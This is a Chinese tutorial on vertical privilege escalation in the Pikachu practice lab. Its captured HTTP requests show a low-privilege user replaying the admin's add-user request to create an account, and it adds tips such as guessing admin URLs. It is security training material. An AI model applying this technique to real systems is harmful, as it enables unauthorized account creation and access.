垂直越权

垂直越权就是权限较低的用户去执行高权限用户的操作，以Pikachu靶场为演示。

一、系统提示，存在admin、pikachu两个高低权限账号。

pichachu低权限只有查看功能，并没有操作功能点

admin管理员权限有操作功能‘

二：抓取admin有操作功能的数据包

'''管理员监听数据包'''
POST /pikachu-master/vul/overpermission/op2/op2_admin_edit.php HTTP/1.1
Host: 10.0.0.156:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 96
Origin: http://10.0.0.156:8080
Connection: close
Referer: http://10.0.0.156:8080/pikachu-master/vul/overpermission/op2/op2_admin_edit.php
Cookie: PHPSESSID=b8ee7da2f5f15683efa411b224a47e75
Upgrade-Insecure-Requests: 1

username=user1&password=123&sex=man&phonenum=123&email=123&address=123&submit=%E5%88%9B%E5%BB%BA

三：利用pikachu普通用户进行越权验证，直接访问管理员添加用户界面的url

'''普通用户监听数据包'''
返回监听数据包进行ForWard，进行修改
POST /pikachu-master/vul/overpermission/op2/op2_admin_edit.php HTTP/1.1
Host: 10.0.0.156:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://10.0.0.156:8080/pikachu-master/vul/overpermission/op2/op2_login.php
Connection: close
Cookie: PHPSESSID=df71d695db8b06d68a30f8e1f607e040
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

四：添加成功

注意：以上两者用户的PHPSESSID 不一样，我只是演示只通过修改url来实现访问有修改用户的页面功能点；另一种方法是不光修改url还修改PHPSESSID值，通过管理员的参数点来进行添加用户。

前提条件：需获取添加用户的数据包

1、部分网站普通用户也有操作功能，可以抓取数据包来验证
2、通过网站源码本地搭建自己去模拟抓取（不现实）
3、盲猜，一般高权限admin，root（有点实现）